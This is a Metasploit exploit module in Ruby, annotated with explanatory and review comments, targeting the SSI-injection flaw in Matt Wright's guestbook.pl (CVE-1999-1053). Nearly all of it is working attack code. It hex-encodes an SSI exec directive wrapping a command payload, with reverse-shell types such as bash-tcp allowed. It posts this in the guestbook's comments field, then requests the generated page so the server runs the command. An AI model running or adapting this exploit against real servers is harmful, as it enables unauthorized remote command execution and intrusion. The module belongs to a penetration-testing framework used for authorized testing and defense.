##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the SSI-injection weakness in Matt Wright's
  # guestbook.pl (CVE-1999-1053). As the Description below states, the issue
  # is only reachable when HTML posting is enabled in guestbook.pl AND the web
  # server runs the Server-Side Include handler for '.html' files; both are
  # non-default, which is why the metadata classes this as a configuration
  # dependent weakness.
  Rank = ExcellentRanking

  # Provides the HTTP client helpers used in #exploit
  # (send_request_cgi, send_request_raw, normalize_uri).
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the two path options.
  #
  # @param info [Hash] extra metadata merged in by update_info; normally empty.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Matt Wright guestbook.pl Arbitrary Command Execution',
        'Description' => %q{
          The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
          a flaw that may allow arbitrary command execution. The vulnerability
          requires that HTML posting is enabled in the guestbook.pl script, and
          that the web server must have the Server-Side Include (SSI) script
          handler enabled for the '.html' file type. By combining the script
          weakness with non-default server configuration, it is possible to exploit
          this vulnerability successfully.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '1999-1053' ],
          [ 'OSVDB', '84' ],
          [ 'BID', '776' ],
        ],
        # Runs with the privileges of the web server's CGI/SSI handler, not root.
        'Privileged' => false,
        # Command payloads only: the payload text is inserted into a form field
        # (see #exploit), not into a binary buffer, hence no NOPs and a
        # 1024-byte cap.
        'Payload' => {
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
            }
        },
        'Platform' => %w{linux unix win},
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '1999-11-05',
        'DefaultTarget' => 0,
        # NOTE(review): all three Notes fields are UNKNOWN_*; nothing in this
        # module has been characterised for reliability, stability or side
        # effects (for example, the posted entry persists in the guestbook).
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Path of the guestbook.pl CGI script; the POST target in #exploit.
        OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
        # Path of the HTML page the script writes (per the option description);
        # requested in #exploit so the server's SSI handler processes it.
        OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
      ]
    )
  end

  # Submits one guestbook entry whose comments field carries an SSI exec
  # directive, then requests the generated HTML page so that the server-side
  # include is evaluated.
  #
  # The return value is not used by the framework; both HTTP responses are
  # bound to locals that nothing reads, so no success/failure signal is
  # produced here.
  def exploit
    # Random filler for the remaining form fields, so each run differs.
    realname = rand_text_alphanumeric(20)
    email = rand_text_alphanumeric(20)
    city = rand_text_alphanumeric(20)
    state = rand_text_alphanumeric(20)
    country = rand_text_alphanumeric(20)

    # SSI directive wrapping the command payload. Double quotes inside the
    # payload are backslash-escaped so they cannot terminate the cmd="..."
    # attribute; the whole string is then hex-encoded (Rex 'hex-normal' mode)
    # for use in the POST body.
    sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"', '\"') + "\"", 'hex-normal')

    # Step 1: POST the entry to guestbook.pl. The trailing 25 is the request
    # timeout in seconds (HttpClient's second positional argument).
    # NOTE(review): req1 is assigned but never inspected, so a rejected or
    # failed post is not reported.
    req1 = send_request_cgi({
      'uri' => normalize_uri(datastore['URI']),
      'method' => 'POST',
      'data' => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
    }, 25)

    # Step 2: fetch the generated HTML page; with the SSI handler enabled the
    # server evaluates the directive while serving it. No 'method' is given,
    # so the client's default applies. req2 is likewise never read.
    req2 = send_request_raw({
      'uri' => normalize_uri(datastore['URIOUT']),
    }, 25)
  end
end